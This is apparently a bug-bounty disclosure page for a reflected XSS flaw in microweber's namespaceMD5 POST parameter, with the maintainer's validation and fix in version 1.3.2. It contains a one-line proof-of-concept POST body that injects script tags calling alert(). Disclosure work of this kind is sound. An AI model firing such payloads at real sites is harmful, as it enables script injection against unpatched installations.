Post parameter namespaceMD5 is vulnerable to reflected XSS in microweber/microweber

Valid

Reported on

Nov 8th 2022

Description

The POST parameter namespaceMD5 is vulnerable to reflected XSS.

Proof of Concept

// POST request to /module with parameters and payload
namespaceMD5=3389dae361af79b04c9c8e7057f60cc6test}'')"><script>alert()</script><script>alert()</script>&module=settings%2Fgroup%2Flanguage_import&id=mw_admin_import_language_modal_content

Impact

JS injection.

Occurrences

language_import.php L32

We are processing your report and will contact the microweber team within 24 hours. a year ago

We have contacted a member of the microweber team and are waiting to hear back a year ago

Peter Ivanov

commented a year ago

Hello

This error appears only when you have enable the debug mode. Currently on the demo site the debug mode is enabled and that's why you see the error

On user sites an on production sites, the debug mode is not enabled

Peter Ivanov gave praise a year ago

The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1

Peter Ivanov

commented a year ago

oops sorry , i replied to the wrong vulnerability , checking this now

Peter Ivanov validated this vulnerability a year ago

Joel Verghese has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Peter Ivanov marked this as fixed in 1.3.2 with commit df8add a year ago

Peter Ivanov has been awarded the fix bounty

This vulnerability has been assigned a CVE

This vulnerability is scheduled to go public on Dec 20th 2022

language_import.php#L32 has been validated

to join this conversation

We are processing your report and will contact the microweber team within 24 hours. a year ago

We have contacted a member of the microweber team and are waiting to hear back a year ago

Peter Ivanov

commented a year ago

Hello

This error appears only when you have enable the debug mode. Currently on the demo site the debug mode is enabled and that's why you see the error

On user sites an on production sites, the debug mode is not enabled

Peter Ivanov gave praise a year ago

The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1

Peter Ivanov

commented a year ago

oops sorry , i replied to the wrong vulnerability , checking this now

Peter Ivanov validated this vulnerability a year ago

Joel Verghese has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Peter Ivanov marked this as fixed in 1.3.2 with commit df8add a year ago

Peter Ivanov has been awarded the fix bounty

This vulnerability has been assigned a CVE

This vulnerability is scheduled to go public on Dec 20th 2022

language_import.php#L32 has been validated

to join this conversation